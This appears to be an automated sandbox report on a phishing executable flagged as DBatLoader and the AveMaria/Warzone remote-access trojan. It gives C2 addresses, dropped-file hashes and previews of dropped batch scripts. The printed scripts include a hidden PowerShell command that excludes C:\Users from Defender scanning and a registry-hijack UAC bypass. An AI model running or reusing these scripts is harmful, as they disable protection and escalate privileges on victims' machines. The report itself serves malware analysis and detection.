Report c9ee1d6a90be7524b01814f48b39b232 Compressed
Report c9ee1d6a90be7524b01814f48b39b232 Compressed
Table of Contents 2
Windows Analysis Report Scan_IMG-Purchase Order.exe 4
Overview 4
General Information 4
Detection 4
Signatures 4
Classification 4
Process Tree 4
Malware Configuration 4
Yara Signatures 4
Initial Sample 4
Dropped Files 5
Memory Dumps 5
Unpacked PEs 5
Sigma Signatures 5
Snort Signatures 5
Joe Sandbox Signatures 6
AV Detection 6
Exploits 7
Compliance 7
Networking 7
E-Banking Fraud 7
System Summary 7
Data Obfuscation 7
Hooking and other Techniques for Hiding and Protection 7
HIPS / PFW / Operating System Protection Evasion 7
Lowering of HIPS / PFW / Operating System Security Settings 7
Stealing of Sensitive Information 7
Remote Access Functionality 7
Mitre Att&ck Matrix 7
Behavior Graph 8
Screenshots 9
Thumbnails 9
Antivirus, Machine Learning and Genetic Malware Detection 10
Initial Sample 10
Dropped Files 10
Unpacked PE Files 10
Domains 13
URLs 13
Domains and IPs 14
Contacted Domains 14
Contacted URLs 14
URLs from Memory and Binaries 14
World Map of Contacted IPs 14
Public IPs 14
Private 15
General Information 15
Warnings 15
Simulations 16
Behavior and APIs 16
Joe Sandbox View / Context 16
IPs 16
Domains 16
ASNs 16
JA3 Fingerprints 16
Dropped Files 16
Created / dropped Files 16
C:\Program Files\Microsoft DN1\rdpwrap.ini 16
C:\Program Files\Microsoft DN1\sqlmap.dll 17
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_159.exe_abfdf579450b8d0fec7425a8b3fe66ef4772d_b614c5c2_0e3516c1\Report.wer
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE3F9.tmp.dmp 1717
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREDED.tmp.WERInternalMetadata.xml 18
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF139.tmp.xml 18
C:\Users\Public\Libraries\Cdex.bat 18
C:\Users\Public\Libraries\Null 18
C:\Users\Public\Libraries\Scxozm.exe 19
C:\Users\Public\Libraries\Scxozm.exe:Zone.Identifier 19
C:\Users\Public\Libraries\ScxozmO.bat 19
C:\Users\Public\Libraries\Scxozmt.bat 20
C:\Users\Public\Libraries\mzoxcS.url 20
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Scxozmyplhmqutylctxlkglsugzstqx[1] 20
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Scxozmyplhmqutylctxlkglsugzstqx[1] 21
C:\Users\user\AppData\Local\Temp\159.exe 21
C:\Users\user\AppData\Roaming\.JmyHai.tmp 21
C:\Users\user\AppData\Roaming\JJrxrvA.tmp 22
\Device\ConDrv 22
Copyright Joe Security LLC 2022 Page 2 of 74
Static File Info 22
General 22
File Icon 23
Static PE Info 23
General 23
Entrypoint Preview 23
Data Directories 23
Sections 24
Resources 24
Imports 25
Possible Origin 26
Network Behavior 27
Snort IDS Alerts 27
Network Port Distribution 27
TCP Packets 27
UDP Packets 29
DNS Queries 29
DNS Answers 29
HTTP Request Dependency Graph 30
HTTPS Proxied Packets 30
Statistics 46
Behavior 46
System Behavior 46
Analysis Process: Scan_IMG-Purchase Order.exePID: 1476, Parent PID: 3396 46
General 46
File Activities 52
Registry Activities 52
Key Value Created 52
Analysis Process: cmd.exePID: 792, Parent PID: 1476 52
General 52
File Activities 53
File Read 53
Analysis Process: conhost.exePID: 5528, Parent PID: 792 53
General 53
Analysis Process: cmd.exePID: 5784, Parent PID: 792 53
General 53
File Activities 53
Analysis Process: conhost.exePID: 5472, Parent PID: 5784 54
General 54
Analysis Process: Scan_IMG-Purchase Order.exePID: 3364, Parent PID: 1476 54
General 54
File Activities 55
File Created 55
File Deleted 56
File Written 56
File Read 58
Registry Activities 58
Key Created 58
Key Value Created 59
Key Value Modified 59
Analysis Process: Scxozm.exePID: 5768, Parent PID: 3616 59
General 59
File Activities 63
File Created 63
File Written 64
File Read 65
Analysis Process: 159.exePID: 5528, Parent PID: 3364 65
General 65
Analysis Process: netsh.exePID: 4672, Parent PID: 5528 65
General 65
File Activities 66
File Written 66
Analysis Process: conhost.exePID: 6132, Parent PID: 4672 66
General 66
Analysis Process: Scxozm.exePID: 1384, Parent PID: 3616 66
General 66
File Activities 70
File Created 70
File Written 71
File Read 71
Analysis Process: rdpvideominiport.sysPID: 4, Parent PID: -1 71
General 71
Analysis Process: WerFault.exePID: 3708, Parent PID: 5528 72
General 72
Analysis Process: rdpdr.sysPID: 4, Parent PID: -1 72
General 72
Analysis Process: tsusbhub.sysPID: 4, Parent PID: -1 72
General 72
Analysis Process: Scxozm.exePID: 3676, Parent PID: 5768 73
General 73
Analysis Process: Scxozm.exePID: 3108, Parent PID: 1384 73
General 74
Disassembly 74
Overview
12c080569f9bf82…
Yara detected UACMe UAC Bypass… Miner Spreading
SHA256: 6da3064773edf0…
Yara detected AveMaria stealer
malicious
malicious
malicious
Tags:
Evader Phishing
exe suspicious
suspicious
suspicious
Infos:
clean
Score: 100
Snort IDS alert for network traffic
Range: 0 - 100
Dropped Files
Source Rule Description Author Strings
Memory Dumps
Source Rule Description Author Strings
Unpacked PEs
Source Rule Description Author Strings
Sigma Signatures
⊘ No Sigma rule has matched
Snort Signatures
ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) - Source IP: 185.222.57.173 - Destination IP: 192.168.2.4
SID: 2851895
Protocol: TCP
ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsResponse - Source IP: 192.168.2.4 - Destination IP: 185.222.57.173
SID: 2851951
Protocol: TCP
ETPRO TROJAN Ave Maria/Warzone RAT PingResponse - Source IP: 192.168.2.4 - Destination IP: 185.222.57.173
SID: 2851946
Protocol: TCP
ETPRO TROJAN Ave Maria/Warzone RAT VNC GetModule - Source IP: 192.168.2.4 - Destination IP: 185.222.57.173
SID: 2851948
Protocol: TCP
ETPRO TROJAN Ave Maria/Warzone RAT PingCommand - Source IP: 185.222.57.173 - Destination IP: 192.168.2.4
SID: 2851945
Protocol: TCP
ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsCommand - Source IP: 185.222.57.173 - Destination IP: 192.168.2.4
SID: 2851933
Protocol: TCP
AV Detection
Compliance
Networking
E-Banking Fraud
System Summary
Data Obfuscation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Increases the number of concurrent connection per server for Internet Explorer
Default Scheduled 1 1 1 LSASS 1 4 Remote Data from Exfiltration 1 Exploit SS7 Remotely Device
Accounts Task/Job DLL Side- DLL Side- Scripting Memory System Desktop Removable Over Encrypted to Redirect Wipe Data Lockout
Loading Loading Information Protocol Media Bluetooth Channel Phone Without
Discovery Calls/SMS Authorizati
on
Domain At (Linux) 2 2 1 1 Security 1 SMB/Wind Data from Automated 1 Exploit SS7 Obtain Delete
Accounts Windows Windows Obfuscated Account Query ows Admin Network Exfiltration Non- to Track Device Device
Service Service Files or Manager Registry Shares Shared Standard Device Cloud Data
Information Drive Port Location Backups
Replication Launchd Rc.commo Rc.commo 3 Cached 1 VNC GUI Input Exfiltration Multiband Jamming or Abuse
Through n n Masqueradi Domain Remote Capture Over C2 Communic Denial of Accessibilit
Removable ng Credentials System Channel ation Service y Features
Media Discovery
External Scheduled Startup Startup 2 DCSync Network Windows Web Portal Exfiltration Commonly Rogue Wi- Data
Remote Task Items Items Virtualizatio Sniffing Remote Capture Over Used Port Fi Access Encrypted
Services n/Sandbox Manageme Alternative Points for Impact
Evasion nt Protocol
Drive-by Command Scheduled Scheduled 1 1 1 Proc Network Shared Credential Exfiltration Application Downgrade Generate
Compromis and Task/Job Task/Job Process Filesystem Service Webroot API Over Layer to Insecure Fraudulent
e Scripting Injection Scanning Hooking Symmetric Protocol Protocols Advertising
Interpreter Encrypted Revenue
Non-C2
Protocol
Exploit PowerShell At (Linux) At (Linux) 1 /etc/passw System Software Data Exfiltration Web Rogue Data
Public- Hidden d and Network Deploymen Staged Over Protocols Cellular Destruction
Facing Files and /etc/shado Connection t Tools Asymmetric Base
Application Directories w s Encrypted Station
Discovery Non-C2
Protocol
Supply AppleScript At At 1 Network Process Taint Local Data Exfiltration File Data
Chain (Windows) (Windows) Hidden Sniffing Discovery Shared Staging Over Transfer Encrypted
Compromis Users Content Unencrypte Protocols for Impact
e d/Obfuscat
ed Non-C2
Protocol
Behavior Graph
Sample:
Startdate:
Scan_IMG-Purchase Order.exe
25/07/2022
Legend:
Architecture: WINDOWS
Score: 100
Process
Snort IDS alert for
network traffic
Multi AV Scanner detection
for domain / URL
Malicious sample detected
(through community Yara 8 other signatures started started started
Signature
rule)
Created File
Scan_IMG-Purchase Order.exe Scxozm.exe Scxozm.exe
1 21 13 13
Is Dropped
morientlines.com
Visual Basic
Detected unpacking (creates
Injects a PE file into Multi AV Scanner detection
a PE file in dynamic
a foreign processes for dropped file
memory)
8 12 1
Java
mosesmanservernew.hopto.org
.Net C# or VB.NET
127.0.0.1
185.222.57.173, 49772, 4980 unknown dropped dropped
ROOTLAYERNETNL
Netherlands
unknown
C, C++ or other language
239.255.255.250
unknown
Reserved
192.168.2.1
started unknown
unknown
conhost.exe
Screenshots
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Dropped Files
Source Detection Scanner Label Link
Unpacked PE Files
Domains
Source Detection Scanner Label Link
URLs
Source Detection Scanner Label Link
Contacted URLs
Name Malicious Antivirus Detection Reputation
www.emerge.deDVarFileInfo$ Scan_IMG-Purchase Order.exe, 00000000.00 false Avira URL Cloud: safe low
000000.250696523.0000000000486000.000000
02.00000001.01000000.00000003.sdmp, Scan_IMG-
Purchase Order.exe, 00000000.00000003.2607035
90.00000000048B0000.00000004.00001000.00
020000.00000000.sdmp, Scan_IMG-Purchase
Order.exe, 00000000.00000003.253187444.0
000000004900000.00000004.00001000.000200
00.00000000.sdmp, Scan_IMG-Purchase Order.exe,
00000000.00000003.251354432.000000007FD0000
0.00000004.00001000.00020000.00000000.sdmp
Public IPs
IP Domain Country Flag ASN ASN Name Malicious
Private
IP
192.168.2.1
127.0.0.1
General Information
Joe Sandbox Version: 35.0.0 Citrine
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winEXE@22/19@4/5
Warnings
Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe,
wuapihost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (wh itelisted): 23.211.6.115, 20.189.173.22, 20.112.52.29, 20.81.111.85, 20.84.181.62, 20.103.85.33, 20.53.203.50
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, store-images.s-
microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, blobcollector.events.da
ta.trafficmanager.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, microsoft.com
Execution Graph export aborted for target Scan_IMG-Purchase Order.exe, PID 1476 because th ere are no executed function
Not all processes where analyz ed, report is missing behavior information
Report creation exceeded maximum time and may have missing d isassembly code information.
Report size exceeded maximum c apacity and may have missing b ehavior information.
Report size getting too big, t oo many NtAllocateVirtualMemory calls found.
Report size getting too big, t oo many NtOpenKeyEx calls found.
Report size getting too big, t oo many NtProtectVirtualMemory calls found.
Report size getting too big, t oo many NtQueryValueKey calls found.
15:50:50 API Interceptor 2x Sleep call for process: Scan_IMG-Purchase Order.exe modified
IPs
⊘ No context
Domains
⊘ No context
ASNs
⊘ No context
JA3 Fingerprints
⊘ No context
Dropped Files
⊘ No context
Category: dropped
Encrypted: false
SSDEEP: 768:gUiQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb5x8Rr/d6gl/+f8jZ0ftlFi4Q7Q3:wj33L+MAIiG4IvREWddadl/FD
MD5: 07D22A33EACF7D4250CD3256803B1361
SHA1: 41908A6C88B58943C3E3928AB699779AC940C5BF
SHA-256: 6543C4ED9934DCBD6A8869DF5432F10298FF7634AFF3A5DAF407D067CEC79CCB
SHA-512: C623CC0792EF9C2F83B25BF7F1D9F3524E51A3DC4830887B60B55753157CA8394A9763D302C6BBABCE8E302B56202F5DBC867EAEC6E7B67D2ED354E9F8AA4E
C3
Malicious: false
Preview: ; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2022-07-02..LogFile=\rdpwrap.txt..SL
PolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnecti
onManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-A
llowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-
89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advan
ced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectio
nManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
Category: dropped
Encrypted: false
SSDEEP: 3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
MD5: 461ADE40B800AE80A40985594E1AC236
SHA1: B3892EEF846C044A2B0785D54A432B3E93A968C8
SHA-256: 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
SHA-512: 421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A2
6
Malicious: true
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_159.exe_abfdf579450b8d0fec7425a8b3fe66ef4772d_b614c5c2_0e3516c1\Report.w
er
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Encrypted: false
SSDEEP: 96:nSFtboqcGw1Ahpq7Ef6pXIQcQvc6QcEDMcw3Dr+HbHg/ced6XXrQlD6wZAXGng51:S31wrHBUZMXIjD/u7seS274Itu
MD5: 876404D90AC7E2019504C4678387BD0C
SHA1: 99FDE08272E3411AA62CB2183399E7E7B064BA4B
SHA-256: 562EAFBAAA7F7E9CEEA72650B340D4E93839882139F6B021051D6A35B642E424
SHA-512: FADF437D91DFA177EBC7732BD7F0A627CF734C03B7822C3C3874C74DAFA0111F5AECD4E7C2C19EF6AB3A87BB28E0098F177AA5029B20E1DE056EC660049876
C5
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.3.2.3.0.7.1.2.6.6.3.9.9.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.
o.a.d.T.i.m.e.=.1.3.3.0.3.2.3.0.7.1.9.1.1.3.9.0.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.a.0.b.a.a.0.-.0.4.5.6.-.4.2.7.6.-.b.6.b.2.-.0.8.c.2.0.
b.d.c.6.a.5.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.a.9.6.d.9.a.-.6.c.0.2.-.4.f.b.9.-.b.1.5.9.-.2.d.d.c.e.1.7.d.4.f.a.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.
4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.5.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.9.8.-.0.0.0.1.-.0.0.1.c.-.2.8.d.c.-.f.8.a.4.2.d.a.0.d.8.0.1.....T.a.r.g.e.t.
A.p.p.I.d.=.W.:.0.0.0.6.5.6.1.a.8.4.3.a.1.9.a.e.d.d.5.8.1.9.4.a.9.3.9.c.4.e.7.7.9.2.1.5.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.4.b.1.0.8.1.c.f.5.8.7.2.4.f.8.c.b.2.9.2.b.4.d.1.6.5.d.f.e.e.2.
f.b.1.c.9.f.6.!.1.5.9...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.0.2././.
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE3F9.tmp.dmp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Mon Jul 25 13:51:54 2022, 0x1205a4 type
Category: dropped
Encrypted: false
SSDEEP: 192:GGem5JWO2YiDGih2Dvy15MV48A5w3QcDhDoMhiPBG:X2fGDvy1q48Ai3QcV1h
MD5: 8EE0F8FFBEFD29FC941317D2DDE1310C
SHA1: 739225AA57E784185F0DD9DB1D97CF84695AF317
SHA-256: A3B9860A1015D691EF996D4C7BC76272DBBE71293FE171B4FCEA6836A9593D2F
SHA-512: 2FEF061CBA6C96601EC7AE2989E13DED9DE52F8772FF23F329BB2E7B353ED7CEA28978A7BEF57CC6C4A94B55DBC788029B2FF80247C97681F2B76A264A5B76
BB
Malicious: false
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Encrypted: false
SSDEEP: 192:Rrl7r3GLNiu86zu6YQ46pxgmfBSr+prR89b25sfYym:RrlsNid6zu6Y36PgmfBSh2Sfc
MD5: CB17E4D09F2D9AF2A6CEF66CFFC5ACBC
SHA1: 89832FDC1D5A1966A91BFBA04CC1A800B32C9440
SHA-256: 6B02EC1C83184778F8A0A8970E9D4605AAFA04BD206A5469D5992BE45E28C493
SHA-512: DED5F3F017B62CA05D0DAA67D78BD2B4F7E4409DEC431130B97569F7D00A74961E1475C39DDD893F7C43FA7AB81A001F0650836FBA0F939B4EEB0017D4B34E6
8
Malicious: false
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF139.tmp.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Encrypted: false
SSDEEP: 48:cvIwSD8zsoAtJgtWI9aUWgc8sqYjC8fm8M4JkbFF+q80nRhDHdd:uITfoAHNNgrsqY7JIRRdHdd
MD5: D79EA964DE4829F003584DD04F787F5F
SHA1: 67BC13C7A82890047D99889826BD1252A8867027
SHA-256: 8BFBC6EC2C1BD1BE354E3B2E491E3923D286B146D53958C39DE784B0FA074450
SHA-512: 08947375346B8BEA9501E736637E7B7448B07786CD4497B3C3D6E753819137CD7A668F6702CC1CE055431826517594EA33D38C8BBF3A8DDD458CD002E37226A0
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10"
/>.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />..
<arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid"
val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1"
/>.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1618502" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-
11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\Users\Public\Libraries\Cdex.bat
Category: dropped
Encrypted: false
SSDEEP: 3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
MD5: 213C60ADF1C9EF88DC3C9B2D579959D2
SHA1: E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
SHA-256: 37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
SHA-512: FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA56921
7B7
Malicious: false
Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
C:\Users\Public\Libraries\Null
Category: modified
Encrypted: false
SSDEEP: 3:Nov:E
MD5: 714DFE7F469037958B8C2CBAC6CDB940
SHA1: 07A28019BA49041B81776FAC401B12A4404E4141
SHA-256: 412A8DA13330793D63A3A17BED32C76BE361EDAD27FE0F6A0CEB144D3F0AA50E
SHA-512: FB698653705D64243F0553D26E213E095ABA7332DFB60DEE931A488C7CA52963FA08C764B0D8DDA8EE7B32790BD7E658526A9495BA778467B9FF1BD120652D43
Malicious: false
Preview: 11..
C:\Users\Public\Libraries\Scxozm.exe
Category: dropped
Encrypted: false
SSDEEP: 24576:XWWH7k2z/m1uA7Zo4pdUtVSn52pAf2rDNtl2aCHXeO:XWrqMpd+Sn52KN5
MD5: C9EE1D6A90BE7524B01814F48B39B232
SHA1: 12C080569F9BF82E0C1538BC9CAEF4DE06DB5BFD
SHA-256: 6DA3064773EDF094F014B7AA13F2E3F74634F62552A91F88BF306F962BBF0563
SHA-512: A616FC149D7ED3ED199AAB73B68DA13DF0304C310D7AA85D8E5E8A14C37070835E1C5F04631C03C270B6FC803C469EE35350049B930D6F03F6A320FE02348AC
B
Malicious: true
Yara Hits: Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Scxozm.exe, Author: Joe Security
C:\Users\Public\Libraries\Scxozm.exe:Zone.Identifier
Category: dropped
Size (bytes): 26
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64
E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0
C:\Users\Public\Libraries\ScxozmO.bat
Category: dropped
Encrypted: false
SSDEEP: 24:oWRjvXo4P3TWMVxf9PjxVN5yV1vYFp85XwdtzgQprH83GTwIxIF:oWZvoaTWMVxpjxdyz48hwf8Qx83GTwsi
MD5: DF48C09F243EBCC8A165F77A1C2BF889
SHA1: 455F7DB0ADCC2A58D006F1630FB0BD55CD868C07
SHA-256: 4EF9821678DA07138C19405387F3FB95E409FBD461C7B8D847C05075FACD63CA
Malicious: true
Yara Hits: Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
C:\Users\Public\Libraries\ScxozmO.bat, Author: Joe Security
Preview: .@echo off.set mypath=%cd%.if "%~1" equ "" (set saka=%mypath%\Cdex.bat) ELSE set "saka=%~1"...net session >nul 2>&1 || goto :label.%saka% .exit /b 2...:label.::
REQUIREMENTS.whoami /groups|findstr /i "\<S-1-5-32-544\>" >nul 2>&1.if ERRORLEVEL 1 exit /b 1...::Windows Version.for /f "tokens=4-5 delims=. " %%i in ('ver') do
set WIN_VER=%%i.%%j...::aka Level.:: 2 High.:: 5 Default.:: 0 None.set key="HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System".for /f "skip=2 tok
ens=3" %%U in ('REG QUERY %key% /v ConsentPromptBehaviorAdmin') do set /a "aka=%%U"...::EXPLOIT.if %aka% equ 2 exit /b 1.if %aka% equ 5 (..for %%V in (6.1
6.2 6.3) do if "%WIN_VER%" == "%%V" call :exploit mscfile CompMgmtLauncher.exe %saka%..if "%WIN_VER%" == "10.0" call :exploit ms-settings ComputerDefaults.
exe %saka%.)>nul 2>&1.if %aka% equ 0 powershell -c Start-Process "%saka%" -Verb runas...exit /b 0...:exploit <key> <trigger> <saka>.set regPath="HKCU\Software\C
lasses\%1\shell\open\command".reg add %regPath% /d
C:\Users\Public\Libraries\Scxozmt.bat
Category: dropped
Size (bytes): 55
Encrypted: false
SSDEEP: 3:LjTnaHF5pBMuo/6OR:rnaH1BMrR
MD5: AAC312AA000B880F5E42EE006186899F
SHA1: C1EBCCFB40EB4F47930F87373B153F5F23C97094
SHA-256: 7F98A4DDC25F81C381505F34BADA8FB5A3BC4F60A5AF86B7CDD9F64427299BF1
SHA-512: 28561398A8D1C6A96537EFFF6365AD9A235F930FC8810251D8A97AEEA55DC2EBDACBC9895CC0AACB408BE85E90526E63C822DF9972CBAA91210C60BE0543A0
7E
Malicious: false
C:\Users\Public\Libraries\mzoxcS.url
File Type: MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Scxozm.exe">), ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 98
Encrypted: false
SSDEEP: 3:HRAbABGQYmTWAX+rSF55i0XMvKFbsGKd5lPgvn:HRYFVmTWDyzPbsb5lPqn
MD5: 6C86658D6A33C010F28F5F1EF58A5B7D
SHA1: E162D7ECE39AFC90711768FBCB695A308364E0E9
SHA-256: C97D3AD38553ACE981F4C6A237A2548A6B518BCFA713AD3BAC70092BC5DF5C59
SHA-512: B8AA021DE758FFD1B216F114515DF717E94B250E6D1A9B3CC261C71B1ACA2C9366C66C3478606436AEFF5B3AF4D28EF3809C0C3A01833080D54270A280D28FF4
Malicious: false
Yara Hits: Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\mzoxcS.url, Author:
@itsreallynick (Nick Carr)
Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source:
C:\Users\Public\Libraries\mzoxcS.url, Author: @itsreallynick (Nick Carr)
Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Scxozm.exe"..IconIndex=10..HotKey=11..
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Scxozmyplhmqutylctxlkglsugzstqx[1]
Process: C:\Users\Public\Libraries\Scxozm.exe
Category: dropped
Encrypted: false
SSDEEP: 6144:b4AP3DUNDyuTUze97nNhmOtgDQBCu3StMGP3KtUmpOypRavJLcBTZIqysbd3WKgy:bfzO0z7ygcMwRgQBTZbBbd3WT6ptDJYq
MD5: 1D6F69EA73F2FB295552EB8F608B5675
SHA1: D19B3E3A514D5754AA554747D19337207E0EE097
SHA-256: 6952DDE712DFCE0F1049AFF27CE9B8E68451672DA9DD7702201EA1D633E2B633
SHA-512: 9A60767CE2E045525B55710461496CFC03D9F7B2DB18E8D5ABAEBF0771E70759371DDEA50754E09B8D2780A6DAD1845624F356E86552508A685BEA252CED19C2
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Scxozmyplhmqutylctxlkglsugzstqx[1]
Category: dropped
Encrypted: false
SSDEEP: 6144:b4AP3DUNDyuTUze97nNhmOtgDQBCu3StMGP3KtUmpOypRavJLcBTZIqysbd3WKgy:bfzO0z7ygcMwRgQBTZbBbd3WT6ptDJYq
MD5: 1D6F69EA73F2FB295552EB8F608B5675
SHA1: D19B3E3A514D5754AA554747D19337207E0EE097
SHA-256: 6952DDE712DFCE0F1049AFF27CE9B8E68451672DA9DD7702201EA1D633E2B633
SHA-512: 9A60767CE2E045525B55710461496CFC03D9F7B2DB18E8D5ABAEBF0771E70759371DDEA50754E09B8D2780A6DAD1845624F356E86552508A685BEA252CED19C2
Malicious: false
Preview: .$Z.9.......55..............................................7...U...~?.W.7..W.2...:<..<...88.>.,..<.8.8........CC..........Q.N.UN.UN.U.o|U..U..tU..U...U..U..^U..U...UL.U...UJ.U..3U..U...U..U
N.>Ux.U/..UP.U/.^U..U..xU..U/..U..U...2N.U.{...7..O(............'A7.O......9.....y.......:............................................7....................................>G....9...9....................b_................
.....................................f.................................................................*.......................................*........f....:.................................*....Z.......8.........................>G..........8.................
........b_..........J................................9......t...................<.<......9...9...9..v................................9..............................................................................................................................
..................................
C:\Users\user\AppData\Local\Temp\159.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category: dropped
Encrypted: false
SSDEEP: 1536:tjL6b1xoQ66K+jLMqPHULq87qdGN2B30GfDQ+1FIRXWHH0:t0BVbjQaNpd82xpLQ+126H0
MD5: CA96229390A0E6A53E8F2125F2C01114
SHA1: A54B1081CF58724F8CB292B4D165DFEE2FB1C9F6
SHA-256: 0DF3D05900E7B530F6C2A281D43C47839F2CF2A5D386553C8DC46E463A635A2C
SHA-512: E93445BCE6C8B6F51890309577A0EA9369860D2E6BF8CC0CA708879A77BB176D27C5F559BBDB7DEB4B719AEE0FC48D9068C293559F7629BAF4EC3515898102E
F
Malicious: true
